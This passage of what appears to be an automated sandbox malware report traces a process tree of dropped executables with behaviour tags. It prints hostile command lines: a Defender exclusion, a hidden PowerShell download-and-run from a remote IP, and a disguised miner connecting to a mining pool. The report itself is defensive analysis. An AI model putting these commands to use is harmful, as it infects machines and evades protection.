                                      PID:4892
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:5664
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                      7⤵
                                        PID:5844
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2
                                        7⤵
                                          PID:5396
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3880 /prefetch:2
                                          7⤵
                                            PID:6000
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2292 /prefetch:2
                                            7⤵
                                              PID:5388
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:2
                                              7⤵
                                                PID:5600
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2420 /prefetch:2
                                                7⤵
                                                  PID:4836
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2496 /prefetch:2
                                                  7⤵
                                                    PID:5148
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  6⤵
                                                  • Uses browser remote debugging
                                                  PID:5552
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
                                                    7⤵
                                                      PID:5892
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,15895515533642466494,13465131436476367318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
                                                      7⤵
                                                        PID:5368
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                      6⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:5400
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
                                                        7⤵
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:5876
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
                                                        7⤵
                                                          PID:5368
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                                                          7⤵
                                                            PID:4388
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
                                                            7⤵
                                                              PID:5768
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                              7⤵
                                                              • Uses browser remote debugging
                                                              PID:5392
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                              7⤵
                                                              • Uses browser remote debugging
                                                              PID:5928
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                                                              7⤵
                                                                PID:5316
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
                                                                7⤵
                                                                • Uses browser remote debugging
                                                                PID:5760
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
                                                                7⤵
                                                                • Uses browser remote debugging
                                                                PID:5388
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
                                                                7⤵
                                                                  PID:5496
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2
                                                                  7⤵
                                                                    PID:5828
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2
                                                                    7⤵
                                                                      PID:2352
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2208 /prefetch:2
                                                                      7⤵
                                                                        PID:5868
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4784 /prefetch:2
                                                                        7⤵
                                                                          PID:1836
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2536 /prefetch:2
                                                                          7⤵
                                                                            PID:3744
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 788
                                                                        5⤵
                                                                        • Program crash
                                                                        PID:2856
                                                                    • C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4380
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""
                                                                        5⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:2228
                                                                    • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5068
                                                                      • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3940
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 792
                                                                        5⤵
                                                                        • Program crash
                                                                        PID:2616
                                                                    • C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
                                                                      4⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2352
                                                                    • C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
                                                                      4⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      PID:5068
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAF5.tmp\FAF6.tmp\FAF7.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
                                                                        5⤵
                                                                          PID:4752
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                                                                            6⤵
                                                                            • Blocklisted process makes network request
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:1968
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:6092
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgpnm4xz\vgpnm4xz.cmdline"
                                                                                8⤵
                                                                                  PID:3644
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB81B.tmp" "c:\Users\Admin\AppData\Local\Temp\vgpnm4xz\CSCBC6EB7F1C56F4088AC3A5D91EAABC6C2.TMP"
                                                                                    9⤵
                                                                                      PID:5508
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:868
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4424
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5496
                                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              5⤵
                                                                              • Downloads MZ/PE file
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5536
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5892
                                                                            • C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:524
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 808
                                                                              5⤵
                                                                              • Program crash
                                                                              PID:5124
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5432
                                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5976
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4940
                                                                          • C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe"
                                                                            4⤵
                                                                              PID:5380
                                                                        • C:\Windows\System32\notepad.exe
                                                                          --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
                                                                          2⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:2356
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5088
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1036
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:2252
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5172
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5124
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FI "PID eq 2356"
                                                                          2⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:1588
                                                                      • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4152
                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
